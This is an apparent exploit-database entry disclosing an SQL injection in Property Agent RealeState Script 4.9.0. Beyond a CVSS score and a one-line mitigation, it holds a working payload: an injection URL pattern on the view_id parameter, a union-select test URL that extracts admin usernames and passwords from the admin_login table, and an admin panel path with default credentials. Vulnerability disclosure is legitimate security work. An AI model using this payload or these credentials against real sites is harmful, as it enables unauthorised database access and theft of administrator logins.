header-logo
Suggest Exploit
vendor:
Property Agent RealeState Script
by:
Meisam Monsef
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Property Agent RealeState Script
Affected Version From: 4.9.0
Affected Version To: 4.9.0
Patch Exists: NO
Related CWE: N/A
CPE: a:phpscriptsmall:property_agent_realestate_script
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2015

Property Agent RealeState Script Sql Injection

Property Agent RealeState Script is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this vulnerability to manipulate SQL queries by injecting arbitrary SQL code. This may allow the attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All input data should be validated and filtered before being passed to the SQL server.
Source

Exploit-DB raw data:

# Exploit Title: Property Agent RealeState Script Sql Injection
# Date: 2015-05-27
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage:
http://www.phpscriptsmall.com/product/php-realestate-script/
# Version: 4.9.0

Exploit :
http://server/[path]/single.php?view_id=-99999+[SQl+Command]

Test :
http://server/single.php?view_id=-57+/*!50000union*/+select+1,2,user_name,4,5,6,7,8,password,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+admin_login

Admin Panel : http://server/admin/
Username : admin
Password : inetsol

Navigation

Suggest Exploit

Services By CQR